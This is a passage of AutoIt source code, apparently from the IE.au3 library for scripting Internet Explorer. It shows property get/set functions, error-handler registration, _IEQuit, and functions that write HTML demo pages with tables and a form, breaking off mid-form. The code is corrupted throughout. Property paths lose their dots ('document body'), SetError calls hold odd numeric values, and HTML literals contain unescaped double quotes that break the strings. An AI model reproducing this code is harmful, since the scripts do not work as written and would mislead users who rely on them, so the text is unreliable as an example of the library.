  2846. $OTEMP = $OOBJECT.document body
  2847. ELSE
  2848. $OTEMP = $OOBJECT
  2849. ENDIF
  2850. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OTEMP.outerText )
  2851. CASE $SPROPERTY = "innerhtml"
  2852. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2853. $OTEMP = $OOBJECT.document body
  2854. ELSE
  2855. $OTEMP = $OOBJECT
  2856. ENDIF
  2857. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OTEMP.innerHTML )
  2858. CASE $SPROPERTY = "outerhtml"
  2859. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2860. $OTEMP = $OOBJECT.document body
  2861. ELSE
  2862. $OTEMP = $OOBJECT
  2863. ENDIF
  2864. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OTEMP.outerHTML )
  2865. CASE $SPROPERTY = "title"
  2866. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.document title )
  2867. CASE $SPROPERTY = "uniqueid"
  2868. IF __IEISOBJTYPE ( $OOBJECT , "window" ) THEN
  2869. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidObjectType" )
  2870. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2871. ELSE
  2872. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT.uniqueID )
  2873. ENDIF
  2874. CASE ELSE
  2875. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertyGet" , "$_IESTATUS_InvalidValue" , "Invalid Property" )
  2876. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  2877. ENDSELECT
  2878. ENDFUNC
  2879. FUNC _IEPROPERTYSET ( BYREF $OOBJECT , $SPROPERTY , $VVALUE )
  2880. IF NOT ISOBJ ( $OOBJECT ) THEN
  2881. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidDataType" )
  2882. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  2883. ENDIF
  2884. LOCAL $OTEMP
  2885. #forceref $oTemp
  2886. $SPROPERTY = STRINGLOWER ( $SPROPERTY )
  2887. SELECT
  2888. CASE $SPROPERTY = "addressbar"
  2889. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2890. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2891. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2892. ENDIF
  2893. $OOBJECT.AddressBar = $VVALUE
  2894. CASE $SPROPERTY = "height"
  2895. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2896. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2897. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2898. ENDIF
  2899. $OOBJECT.Height = $VVALUE
  2900. CASE $SPROPERTY = "left"
  2901. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2902. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2903. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2904. ENDIF
  2905. $OOBJECT.Left = $VVALUE
  2906. CASE $SPROPERTY = "menubar"
  2907. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2908. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2909. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2910. ENDIF
  2911. $OOBJECT.MenuBar = $VVALUE
  2912. CASE $SPROPERTY = "offline"
  2913. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2914. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2915. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2916. ENDIF
  2917. $OOBJECT.OffLine = $VVALUE
  2918. CASE $SPROPERTY = "resizable"
  2919. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2920. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2921. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2922. ENDIF
  2923. $OOBJECT.Resizable = $VVALUE
  2924. CASE $SPROPERTY = "statusbar"
  2925. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2926. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2927. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2928. ENDIF
  2929. $OOBJECT.StatusBar = $VVALUE
  2930. CASE $SPROPERTY = "statustext"
  2931. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2932. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2933. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2934. ENDIF
  2935. $OOBJECT.StatusText = $VVALUE
  2936. CASE $SPROPERTY = "top"
  2937. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2938. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2939. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2940. ENDIF
  2941. $OOBJECT.Top = $VVALUE
  2942. CASE $SPROPERTY = "width"
  2943. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2944. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2945. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2946. ENDIF
  2947. $OOBJECT.Width = $VVALUE
  2948. CASE $SPROPERTY = "theatermode"
  2949. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2950. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2951. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2952. ENDIF
  2953. IF $VVALUE THEN
  2954. $OOBJECT.TheaterMode = TRUE
  2955. ELSE
  2956. $OOBJECT.TheaterMode = FALSE
  2957. ENDIF
  2958. CASE $SPROPERTY = "toolbar"
  2959. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  2960. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  2961. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  2962. ENDIF
  2963. IF $VVALUE THEN
  2964. $OOBJECT.ToolBar = TRUE
  2965. ELSE
  2966. $OOBJECT.ToolBar = FALSE
  2967. ENDIF
  2968. CASE $SPROPERTY = "contenteditable"
  2969. IF __IEISOBJTYPE ( $OOBJECT , "browser" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2970. $OTEMP = $OOBJECT.document body
  2971. ELSE
  2972. $OTEMP = $OOBJECT
  2973. ENDIF
  2974. IF $VVALUE THEN
  2975. $OTEMP.contentEditable = "true"
  2976. ELSE
  2977. $OTEMP.contentEditable = "false"
  2978. ENDIF
  2979. CASE $SPROPERTY = "innertext"
  2980. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2981. $OTEMP = $OOBJECT.document body
  2982. ELSE
  2983. $OTEMP = $OOBJECT
  2984. ENDIF
  2985. $OTEMP.innerText = $VVALUE
  2986. CASE $SPROPERTY = "outertext"
  2987. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2988. $OTEMP = $OOBJECT.document body
  2989. ELSE
  2990. $OTEMP = $OOBJECT
  2991. ENDIF
  2992. $OTEMP.outerText = $VVALUE
  2993. CASE $SPROPERTY = "innerhtml"
  2994. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  2995. $OTEMP = $OOBJECT.document body
  2996. ELSE
  2997. $OTEMP = $OOBJECT
  2998. ENDIF
  2999. $OTEMP.innerHTML = $VVALUE
  3000. CASE $SPROPERTY = "outerhtml"
  3001. IF __IEISOBJTYPE ( $OOBJECT , "documentcontainer" ) OR __IEISOBJTYPE ( $OOBJECT , "document" ) THEN
  3002. $OTEMP = $OOBJECT.document body
  3003. ELSE
  3004. $OTEMP = $OOBJECT
  3005. ENDIF
  3006. $OTEMP.outerHTML = $VVALUE
  3007. CASE $SPROPERTY = "title"
  3008. $OOBJECT.document title = $VVALUE
  3009. CASE $SPROPERTY = "silent"
  3010. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  3011. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidObjectType" )
  3012. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  3013. ENDIF
  3014. IF $VVALUE THEN
  3015. $OOBJECT.silent = TRUE
  3016. ELSE
  3017. $OOBJECT.silent = FALSE
  3018. ENDIF
  3019. CASE ELSE
  3020. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_InvalidValue" , "Invalid Property" )
  3021. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 517 , 5 )
  3022. ENDSELECT
  3023. IF @ERROR THEN
  3024. __IECONSOLEWRITEERROR ( "Error" , "_IEPropertySet" , "$_IESTATUS_COMError" , @ERROR )
  3025. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  3026. ENDIF
  3027. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  3028. ENDFUNC
  3029. FUNC _IEERRORNOTIFY ( $VNOTIFY = DEFAULT )
  3030. IF $VNOTIFY = DEFAULT THEN RETURN $__G_BIEERRORNOTIFY
  3031. IF $VNOTIFY THEN
  3032. $__G_BIEERRORNOTIFY = TRUE
  3033. ELSE
  3034. $__G_BIEERRORNOTIFY = FALSE
  3035. ENDIF
  3036. RETURN 261
  3037. ENDFUNC
  3038. FUNC _IEERRORHANDLERREGISTER ( $SFUNCTIONNAME = "__IEInternalErrorHandler" )
  3039. $__G_OIEERRORHANDLER = OBJEVENT ( "AutoIt.Error" , $SFUNCTIONNAME )
  3040. IF ISOBJ ( $__G_OIEERRORHANDLER ) THEN
  3041. $__G_SIEUSERERRORHANDLER = $SFUNCTIONNAME
  3042. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  3043. ELSE
  3044. $__G_OIEERRORHANDLER = ""
  3045. __IECONSOLEWRITEERROR ( "Error" , "_IEErrorHandlerRegister" , "$_IEStatus_GeneralError" , "Error Handler Not Registered - Check existance of error function" )
  3046. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 261 , 5 )
  3047. ENDIF
  3048. ENDFUNC
  3049. FUNC _IEERRORHANDLERDEREGISTER ( )
  3050. $__G_SIEUSERERRORHANDLER = ""
  3051. $__G_OIEERRORHANDLER = ""
  3052. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  3053. ENDFUNC
  3054. FUNC __IEINTERNALERRORHANDLERREGISTER ( )
  3055. LOCAL $SCURRENTERRORHANDLER = OBJEVENT ( "AutoIt.Error" )
  3056. IF $SCURRENTERRORHANDLER <> "" AND NOT ISOBJ ( $__G_OIEERRORHANDLER ) THEN
  3057. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 5 , FALSE )
  3058. ENDIF
  3059. $__G_OIEERRORHANDLER = OBJEVENT ( "AutoIt.Error" , "__IEInternalErrorHandler" )
  3060. IF ISOBJ ( $__G_OIEERRORHANDLER ) THEN
  3061. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , TRUE )
  3062. ELSE
  3063. $__G_OIEERRORHANDLER = ""
  3064. RETURN SETERROR ( $_IESTATUS_GENERALERROR , 5 , FALSE )
  3065. ENDIF
  3066. ENDFUNC
  3067. FUNC __IEINTERNALERRORHANDLERDEREGISTER ( )
  3068. $__G_OIEERRORHANDLER = ""
  3069. IF $__G_SIEUSERERRORHANDLER <> "" THEN
  3070. $__G_OIEERRORHANDLER = OBJEVENT ( "AutoIt.Error" , $__G_SIEUSERERRORHANDLER )
  3071. ENDIF
  3072. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  3073. ENDFUNC
  3074. FUNC __IEINTERNALERRORHANDLER ( $OCOMERROR )
  3075. IF $__G_BIEERRORNOTIFY OR $__G_BIEAU3DEBUG THEN CONSOLEWRITE ( "--> " & __COMERRORFORMATING ( $OCOMERROR , "----> $IEComError" ) & @CRLF )
  3076. SETERROR ( $_IESTATUS_COMERROR )
  3077. RETURN
  3078. ENDFUNC
  3079. FUNC _IEQUIT ( BYREF $OOBJECT )
  3080. IF NOT ISOBJ ( $OOBJECT ) THEN
  3081. __IECONSOLEWRITEERROR ( "Error" , "_IEQuit" , "$_IESTATUS_InvalidDataType" )
  3082. RETURN SETERROR ( $_IESTATUS_INVALIDDATATYPE , 261 , 5 )
  3083. ENDIF
  3084. IF NOT __IEISOBJTYPE ( $OOBJECT , "browser" ) THEN
  3085. __IECONSOLEWRITEERROR ( "Error" , "_IEQuit" , "$_IESTATUS_InvalidObjectType" )
  3086. RETURN SETERROR ( $_IESTATUS_INVALIDOBJECTTYPE , 261 , 5 )
  3087. ENDIF
  3088. $OOBJECT.quit ( )
  3089. IF @ERROR THEN
  3090. __IECONSOLEWRITEERROR ( "Error" , "_IEQuit" , "$_IESTATUS_COMError" , @ERROR )
  3091. RETURN SETERROR ( $_IESTATUS_COMERROR , @ERROR , 5 )
  3092. ENDIF
  3093. $OOBJECT = 5
  3094. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , 261 )
  3095. ENDFUNC
  3096. #EndRegion Utility functions
  3097. #Region General
  3098. FUNC _IE_INTRODUCTION ( $SMODULE = "basic" )
  3099. LOCAL $SHTML = ""
  3100. SWITCH $SMODULE
  3101. CASE "basic"
  3102. $SHTML &= "<!DOCTYPE html>" & @CR
  3103. $SHTML &= "<html>" & @CR
  3104. $SHTML &= "<head>" & @CR
  3105. $SHTML &= "<meta content="text/html; charset=UTF-8" http-equiv="content-type">" & @CR
  3106. $SHTML &= "<title>_IE_Introduction ("basic")</title>" & @CR
  3107. $SHTML &= "<style>body {font-family: Arial}" & @CR
  3108. $SHTML &= "td {padding:6px}</style>" & @CR
  3109. $SHTML &= "</head>" & @CR
  3110. $SHTML &= "<body>" & @CR
  3111. $SHTML &= "<table border=1 id="table1" style="width:600px;border-spacing:6px;">" & @CR
  3112. $SHTML &= "<tr>" & @CR
  3113. $SHTML &= "<td>" & @CR
  3114. $SHTML &= "<h1>Welcome to IE.au3</h1>" & @CR
  3115. $SHTML &= "IE.au3 is a UDF (User Defined Function) library for the " & @CR
  3116. $SHTML &= "<a href="http://www.autoitscript.com">AutoIt</a> scripting language." & @CR
  3117. $SHTML &= "<br> " & @CR
  3118. $SHTML &= "IE.au3 allows you to either create or attach to an Internet Explorer browser and do " & @CR
  3119. $SHTML &= "just about anything you could do with it interactively with the mouse and " & @CR
  3120. $SHTML &= "keyboard, but do it through script." & @CR
  3121. $SHTML &= "<br>" & @CR
  3122. $SHTML &= "You can navigate to pages, click links, fill and submit forms etc. You can " & @CR
  3123. $SHTML &= "also do things you cannot do interactively like change or rewrite page " & @CR
  3124. $SHTML &= "content and JavaScripts, read, parse and save page content and monitor and act " & @CR
  3125. $SHTML &= "upon browser "events".<br>" & @CR
  3126. $SHTML &= "IE.au3 uses the COM interface in AutoIt to interact with the Internet Explorer " & @CR
  3127. $SHTML &= "object model and the DOM (Document Object Model) supported by the browser." & @CR
  3128. $SHTML &= "<br>" & @CR
  3129. $SHTML &= "Here are some links for more information and helpful tools:<br>" & @CR
  3130. $SHTML &= "Reference Material: " & @CR
  3131. $SHTML &= "<ul>" & @CR
  3132. $SHTML &= "<li><a href="http://msdn1.microsoft.com/">MSDN (Microsoft Developer Network)</a></li>" & @CR
  3133. $SHTML &= "<li><a href="http://msdn2.microsoft.com/en-us/library/aa752084.aspx" target="_blank">InternetExplorer Object</a></li>" & @CR
  3134. $SHTML &= "<li><a href="http://msdn2.microsoft.com/en-us/library/ms531073.aspx" target="_blank">Document Object</a></li>" & @CR
  3135. $SHTML &= "<li><a href="http://msdn2.microsoft.com/en-us/ie/aa740473.aspx" target="_blank">Overviews and Tutorials</a></li>" & @CR
  3136. $SHTML &= "<li><a href="http://msdn2.microsoft.com/en-us/library/ms533029.aspx" target="_blank">DHTML Objects</a></li>" & @CR
  3137. $SHTML &= "<li><a href="http://msdn2.microsoft.com/en-us/library/ms533051.aspx" target="_blank">DHTML Events</a></li>" & @CR
  3138. $SHTML &= "</ul><br>" & @CR
  3139. $SHTML &= "Helpful Tools: " & @CR
  3140. $SHTML &= "<ul>" & @CR
  3141. $SHTML &= "<li><a href="http://www.autoitscript.com/forum/index.php?showtopic=19368" target="_blank">AutoIt IE Builder</a> (build IE scripts interactively)</li>" & @CR
  3142. $SHTML &= "<li><a href="http://www.debugbar.com/" target="_blank">DebugBar</a> (DOM inspector, HTTP inspector, HTML validator and more - free for personal use) Recommended</li>" & @CR
  3143. $SHTML &= "<li><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=e59c3964-672d-4511-bb3e-2d5e1db91038&amp;displaylang=en" target="_blank">IE Developer Toolbar</a> (comprehensive DOM analysis tool)</li>" & @CR
  3144. $SHTML &= "<li><a href="http://slayeroffice.com/tools/modi/v2.0/modi_help.html" target="_blank">MODIV2</a> (view the DOM of a web page by mousing around)</li>" & @CR
  3145. $SHTML &= "<li><a href="http://validator.w3.org/" target="_blank">HTML Validator</a> (verify HTML follows format rules)</li>" & @CR
  3146. $SHTML &= "<li><a href="http://www.fiddlertool.com/fiddler/" target="_blank">Fiddler</a> (examine HTTP traffic)</li>" & @CR
  3147. $SHTML &= "</ul>" & @CR
  3148. $SHTML &= "</td>" & @CR
  3149. $SHTML &= "</tr>" & @CR
  3150. $SHTML &= "</table>" & @CR
  3151. $SHTML &= "</body>" & @CR
  3152. $SHTML &= "</html>"
  3153. CASE ELSE
  3154. __IECONSOLEWRITEERROR ( "Error" , "_IE_Introduction" , "$_IESTATUS_InvalidValue" )
  3155. RETURN SETERROR ( $_IESTATUS_INVALIDVALUE , 261 , 5 )
  3156. ENDSWITCH
  3157. LOCAL $OOBJECT = _IECREATE ( )
  3158. _IEDOCWRITEHTML ( $OOBJECT , $SHTML )
  3159. RETURN SETERROR ( $_IESTATUS_SUCCESS , 5 , $OOBJECT )
  3160. ENDFUNC
  3161. FUNC _IE_EXAMPLE ( $SMODULE = "basic" )
  3162. LOCAL $SHTML = "" , $OOBJECT
  3163. SWITCH $SMODULE
  3164. CASE "basic"
  3165. $SHTML &= "<!DOCTYPE html>" & @CR
  3166. $SHTML &= "<html>" & @CR
  3167. $SHTML &= "<head>" & @CR
  3168. $SHTML &= "<meta content="text/html; charset=UTF-8" http-equiv="content-type">" & @CR
  3169. $SHTML &= "<title>_IE_Example("basic")</title>" & @CR
  3170. $SHTML &= "<style>body {font-family: Arial}</style>" & @CR
  3171. $SHTML &= "</head>" & @CR
  3172. $SHTML &= "<body>" & @CR
  3173. $SHTML &= "<a href="http://www.autoitscript.com"><img src="http://www.autoitscript.com/images/logo_autoit_210x72.png" id="AutoItImage" alt="AutoIt Homepage Image" style="background: #204080;"></a>" & @CR
  3174. $SHTML &= "<p></p>" & @CR
  3175. $SHTML &= "<div id="line1">This is a simple HTML page with text, links and images.</div>" & @CR
  3176. $SHTML &= "<br>" & @CR
  3177. $SHTML &= "<div id="line2"><a href="http://www.autoitscript.com">AutoIt</a> is a wonderful automation scripting language.</div>" & @CR
  3178. $SHTML &= "<br>" & @CR
  3179. $SHTML &= "<div id="line3">It is supported by a very active and supporting <a href="http://www.autoitscript.com/forum/">user forum</a>.</div>" & @CR
  3180. $SHTML &= "<br>" & @CR
  3181. $SHTML &= "<div id="IEAu3Data"></div>" & @CR
  3182. $SHTML &= "</body>" & @CR
  3183. $SHTML &= "</html>"
  3184. $OOBJECT = _IECREATE ( )
  3185. _IEDOCWRITEHTML ( $OOBJECT , $SHTML )
  3186. CASE "table"
  3187. $SHTML &= "<!DOCTYPE html>" & @CR
  3188. $SHTML &= "<html>" & @CR
  3189. $SHTML &= "<head>" & @CR
  3190. $SHTML &= "<meta content="text/html; charset=utf-8" http-equiv="content-type">" & @CR
  3191. $SHTML &= "<title>_IE_Example("table")</title>" & @CR
  3192. $SHTML &= "<style>body {font-family: Arial}</style>" & @CR
  3193. $SHTML &= "</head>" & @CR
  3194. $SHTML &= "<body>" & @CR
  3195. $SHTML &= "$oTableOne = _IETableGetObjByName($oIE, "tableOne")<br>" & @CR
  3196. $SHTML &= "&lt;table border=1 id="tableOne"&gt;<br>" & @CR
  3197. $SHTML &= "<table border=1 id="tableOne">" & @CR
  3198. $SHTML &= " <tr>" & @CR
  3199. $SHTML &= " <td>AutoIt</td>" & @CR
  3200. $SHTML &= " <td>is</td>" & @CR
  3201. $SHTML &= " <td>really</td>" & @CR
  3202. $SHTML &= " <td>great</td>" & @CR
  3203. $SHTML &= " <td>with</td>" & @CR
  3204. $SHTML &= " <td>IE.au3</td>" & @CR
  3205. $SHTML &= " </tr>" & @CR
  3206. $SHTML &= " <tr>" & @CR
  3207. $SHTML &= " <td>1</td>" & @CR
  3208. $SHTML &= " <td>2</td>" & @CR
  3209. $SHTML &= " <td>3</td>" & @CR
  3210. $SHTML &= " <td>4</td>" & @CR
  3211. $SHTML &= " <td>5</td>" & @CR
  3212. $SHTML &= " <td>6</td>" & @CR
  3213. $SHTML &= " </tr>" & @CR
  3214. $SHTML &= " <tr>" & @CR
  3215. $SHTML &= " <td>the</td>" & @CR
  3216. $SHTML &= " <td>quick</td>" & @CR
  3217. $SHTML &= " <td>red</td>" & @CR
  3218. $SHTML &= " <td>fox</td>" & @CR
  3219. $SHTML &= " <td>jumped</td>" & @CR
  3220. $SHTML &= " <td>over</td>" & @CR
  3221. $SHTML &= " </tr>" & @CR
  3222. $SHTML &= " <tr>" & @CR
  3223. $SHTML &= " <td>the</td>" & @CR
  3224. $SHTML &= " <td>lazy</td>" & @CR
  3225. $SHTML &= " <td>brown</td>" & @CR
  3226. $SHTML &= " <td>dog</td>" & @CR
  3227. $SHTML &= " <td>the</td>" & @CR
  3228. $SHTML &= " <td>time</td>" & @CR
  3229. $SHTML &= " </tr>" & @CR
  3230. $SHTML &= " <tr>" & @CR
  3231. $SHTML &= " <td>has</td>" & @CR
  3232. $SHTML &= " <td>come</td>" & @CR
  3233. $SHTML &= " <td>for</td>" & @CR
  3234. $SHTML &= " <td>all</td>" & @CR
  3235. $SHTML &= " <td>good</td>" & @CR
  3236. $SHTML &= " <td>men</td>" & @CR
  3237. $SHTML &= " </tr>" & @CR
  3238. $SHTML &= " <tr>" & @CR
  3239. $SHTML &= " <td>to</td>" & @CR
  3240. $SHTML &= " <td>come</td>" & @CR
  3241. $SHTML &= " <td>to</td>" & @CR
  3242. $SHTML &= " <td>the</td>" & @CR
  3243. $SHTML &= " <td>aid</td>" & @CR
  3244. $SHTML &= " <td>of</td>" & @CR
  3245. $SHTML &= " </tr>" & @CR
  3246. $SHTML &= "</table>" & @CR
  3247. $SHTML &= "<br>" & @CR
  3248. $SHTML &= "$oTableTwo = _IETableGetObjByName($oIE, "tableTwo")<br>" & @CR
  3249. $SHTML &= "&lt;table border="1" id="tableTwo"&gt;<br>" & @CR
  3250. $SHTML &= "<table border=1 id="tableTwo">" & @CR
  3251. $SHTML &= " <tr>" & @CR
  3252. $SHTML &= " <td colspan="4">Table Top</td>" & @CR
  3253. $SHTML &= " </tr>" & @CR
  3254. $SHTML &= " <tr>" & @CR
  3255. $SHTML &= " <td>One</td>" & @CR
  3256. $SHTML &= " <td colspan="3">Two</td>" & @CR
  3257. $SHTML &= " </tr>" & @CR
  3258. $SHTML &= " <tr>" & @CR
  3259. $SHTML &= " <td>Three</td>" & @CR
  3260. $SHTML &= " <td>Four</td>" & @CR
  3261. $SHTML &= " <td colspan="2">Five</td>" & @CR
  3262. $SHTML &= " </tr>" & @CR
  3263. $SHTML &= " <tr>" & @CR
  3264. $SHTML &= " <td>Six</td>" & @CR
  3265. $SHTML &= " <td colspan="3">Seven</td>" & @CR
  3266. $SHTML &= " </tr>" & @CR
  3267. $SHTML &= " <tr>" & @CR
  3268. $SHTML &= " <td>Eight</td>" & @CR
  3269. $SHTML &= " <td>Nine</td>" & @CR
  3270. $SHTML &= " <td>Ten</td>" & @CR
  3271. $SHTML &= " <td>Eleven</td>" & @CR
  3272. $SHTML &= " </tr>" & @CR
  3273. $SHTML &= "</table>" & @CR
  3274. $SHTML &= "</body>" & @CR
  3275. $SHTML &= "</html>"
  3276. $OOBJECT = _IECREATE ( )
  3277. _IEDOCWRITEHTML ( $OOBJECT , $SHTML )
  3278. CASE "form"
  3279. $SHTML &= "<!DOCTYPE html>" & @CR
  3280. $SHTML &= "<html>" & @CR
  3281. $SHTML &= "<head>" & @CR
  3282. $SHTML &= "<meta content="text/html; charset=UTF-8" http-equiv="content-type">" & @CR
  3283. $SHTML &= "<title>_IE_Example("form")</title>" & @CR
  3284. $SHTML &= "<style>body {font-family: Arial}" & @CR
  3285. $SHTML &= "td {padding:6px}</style>" & @CR
  3286. $SHTML &= "</head>" & @CR
  3287. $SHTML &= "<body>" & @CR
  3288. $SHTML &= "<form name="ExampleForm" onSubmit="javascript:alert('ExampleFormSubmitted');" method="post">" & @CR
  3289. $SHTML &= "<table style="border-spacing:6px 6px;" border=1>" & @CR
  3290. $SHTML &= "<tr>" & @CR
  3291. $SHTML &= "<td>ExampleForm</td>" & @CR
  3292. $SHTML &= "<td>&lt;form name="ExampleForm" onSubmit="javascript:alert('ExampleFormSubmitted');" method="post"&gt;</td>" & @CR
  3293. $SHTML &= "</tr>" & @CR
  3294. $SHTML &= "<tr>" & @CR
  3295. $SHTML &= "<td>Hidden Input Element<input type="hidden" name="hiddenExample" value="secret value"></td>" & @CR
  3296. $SHTML &= "<td>&lt;input type="hidden" name="hiddenExample" value="secret value"&gt;</td>" & @CR
  3297. $SHTML &= "</tr>" & @CR
  3298. $SHTML &= "<tr>" & @CR
  3299. $SHTML &= "<td>" & @CR
  3300. $SHTML &= "<input type="text" name="textExample" value="http://" size="20" maxlength="30">" & @CR
  3301. $SHTML &= "</td>" & @CR
  3302. $SHTML &= "<td>&lt;input type="text" name="textExample" value="http://" size="20" maxlength="30"&gt;</td>" & @CR
  3303. $SHTML &= "</tr>" & @CR
  3304. $SHTML &= "<tr>" & @CR
  3305. $SHTML &= "<td>" & @CR
  3306. $SHTML &= "<input type="password" name="passwordExample" size="10">" & @CR
  3307. $SHTML &= "</td>" & @CR
  3308. $SHTML &= "<td>&lt;input type="password" name="passwordExample" size="10"&gt;</td>" & @CR
  3309. $SHTML &= "</tr>" & @CR
  3310. $SHTML &= "<tr>" & @CR
  3311. $SHTML &= "<td>" & @CR
  3312. $SHTML &= "<input type="file" name="fileExample">" & @CR
  3313. $SHTML &= "</td>" & @CR
  3314. $SHTML &= "<td>&lt;input type="file" name="fileExample"&gt;</td>" & @CR
  3315. $SHTML &= "</tr>" & @CR
  3316. $SHTML &= "<tr>" & @CR
  3317. $SHTML &= "<td>" & @CR
  3318. $SHTML &= "<input type="image" name="imageExample" alt="AutoIt Homepage" src="http://www.autoitscript.com/images/logo_autoit_210x72.png" style="background: #204080;>" & @CR
  3319. $SHTML &= "</td>" & @CR
  3320. $SHTML &= "<td>&lt;input type="image" name="imageExample" alt="AutoIt Homepage" src="http://www.autoitscript.com/images/logo_autoit_210x72.png"&gt;</td>" & @CR
  3321. $SHTML &= "</tr>" & @CR
  3322. $SHTML &= "<tr>" & @CR
  3323. $SHTML &= "<td>" & @CR
  3324. $SHTML &= "<textarea name="textareaExample" rows="5" cols="15">Hello!</textarea>" & @CR
  3325. $SHTML &= "</td>" & @CR
  3326. $SHTML &= "<td>&lt;textarea name="textareaExample" rows="5" cols="15"&gt;Hello!&lt;/textarea&gt;</td>" & @CR
  3327. $SHTML &= "</tr>" & @CR
  3328. $SHTML &= "<tr>" & @CR
  3329. $SHTML &= "<td>" & @CR
  3330. $SHTML &= "<input type="checkbox" name="checkboxG1Example" value="gameBasketball">Basketball<br>" & @CR
  3331. $SHTML &= "<input type="checkbox" name="checkboxG1Example" value="gameFootball">Football<br>" & @CR
  3332. $SHTML &= "<input type="checkbox" name="checkboxG2Example" value="gameTennis" checked>Tennis<br>" & @CR
  3333. $SHTML &= "<input type="checkbox" name="checkboxG2Example" value="gameBaseball">Baseball" & @CR
  3334. $SHTML &= "</td>" & @CR
  3335. $SHTML &= "<td>&lt;input type="checkbox" name="checkboxG1Example" value="gameBasketball"&gt;Basketball&lt;br&gt;<br>" & @CR
